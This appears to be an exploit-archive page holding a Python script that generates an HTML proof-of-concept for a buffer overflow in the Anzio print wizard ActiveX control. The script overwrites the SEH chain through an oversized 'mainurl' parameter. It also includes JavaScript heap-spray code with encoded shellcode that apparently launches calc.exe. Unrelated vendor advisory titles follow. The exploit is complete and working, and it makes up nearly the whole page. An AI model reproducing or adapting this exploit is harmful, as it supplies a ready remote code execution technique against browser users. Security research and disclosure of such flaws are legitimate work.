Anzio-expl.htm

21 august, 2008

/-----------

malicioushtml = open('WePO-PoC.html','w')
header = '''
<html>
<head><title>WePO Buffer Overflow PoC</title>
</head>
<body>
'''
malicioushtml.write(header)
objeto = '''
<OBJECT
~  classid="clsid:4CE8026D-5DBF-48C9-B6E9-14A2B1974A3D"
~
codebase="http://www.anzio.com/controls30/printwizocx.cab#version=3,0,0,0"
~  width=0
~  height=0
~  align=center
~  hspace=0
~  id="botontrigger"
|
'''
malicioushtml.write(objeto)
craftedparam = '<param name="mainurl" value="'
craftedparam += 'A' * 0x188  #0x188 padding bytes to fill the buffer
craftedparam += chr(0xFF) * 4   #indicates the end of SEH Chain
craftedparam += chr(0x0C) * 4   #overwrite the SEH, new value will be
0x0C0C0C0C
craftedparam += '">'
malicioushtml.write(craftedparam)
jscode = '''
~  <param name="caption" value="Rompete">
~  <param name="Cancel" value="0">
~  <param name="Default" value="0">
~  <param name="DragCursor" value="-12">
~  <param name="DragMode" value="0">
~  <param name="Enabled" value="-1">
~  <param name="Font" value="MS Sans Serif">
~  <param name="Visible" value="-1">
~  <param name="DoubleBuffered" value="0">
~  <param name="Cursor" value="0">
~  <param name="licensecode" value>
~  <param name="printersetup" value="1">
~  <param name="printername" value="printer">
~  <param name="charset" value="UTF-8">
~  <param name="debug" value="0">
~  <param name="initfile" value>
~  <param name="orientation" value>
~  <param name="duplex" value>
~  <param name="fontname" value>
~  <param name="overlay" value>
~  <param name="bitmap" value>
~  <param name="preview" value="0">
~  <param name="faxnum" value>
~  </OBJECT>

<script>
~  var shellcode =
unescape("%u0de8%u0000%u6b00%u7265%u656e%u336c%u2e32%u6c64%u006c%u15ff%u108c%u0040%uf08b%u08e8%u0000%u5700%u6e69%u7845%u6365%u5600%u15ff%u1030%u0040%uec81%u0400%u0000%u016a%u09e8%u0000%u6300%u6c61%u2e63%u7865%u0065%ud0ff%u0ce8%u0000%u4500%u6978%u5074%u6f72%u6563%u7373%u5600%u15ff%u1030%u0040%u006a%ud0ff");

~  var spraySlide = unescape("%u9090%u9090");
~  var heapSprayToAddress = 0x0c0c0c0c;

~  function getSpraySlide(spraySlide, spraySlideSize)
~  {
~    while (spraySlide.length*2<spraySlideSize)
~    {
~      spraySlide += spraySlide;
~    }
~    spraySlide = spraySlide.substring(0,spraySlideSize/2);
~    return (spraySlide);
~  }

~  var heapBlockSize = 0x100000;
~  var SizeOfHeapDataMoreover = 0x5;
~  var payLoadSize = (shellcode.length * 2);

~  var spraySlideSize = heapBlockSize - (payLoadSize +
SizeOfHeapDataMoreover);
~  var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;

~  var memory = new Array();
~  spraySlide = getSpraySlide(spraySlide,spraySlideSize);

~  for (i=0;i<heapBlocks;i++)
~  {
~    memory[i] = spraySlide +  shellcode;
~  }
~  document.botontrigger.Click();

</script>

</body>
</html>
'''
malicioushtml.write(jscode)
malicioushtml.close()

- -----------/

Cisco

Microsoft

Sun Microsystems

Cisco Security Advisory: Cisco Security Agent Remote Code Execution Vulnerabilities

Cisco Security Advisory: Denial of Service Vulnerability in Cisco Video Surveillance IP Cameras

Cisco Security Advisory: Cisco Unified Contact Center Express Directory Traversal Vulnerability

MS12-007: Vulnerability in AntiXSS Library Could Allow Information Disclosure (2607664)

MS12-006: Vulnerability in SSL/TLS Could Allow Information Disclosure (2643584)

MS12-005: Vulnerability in Microsoft Windows Could Allow Remote Code Execution (2584146)

This Alert covers CVE-2010-0896 for the mail component of the Sun Convergence product

This Alert Covers CVE-2010-0893 for the Mail Component of the Sun Convergence Product

SunOS 5.10_x86: ucode driver patch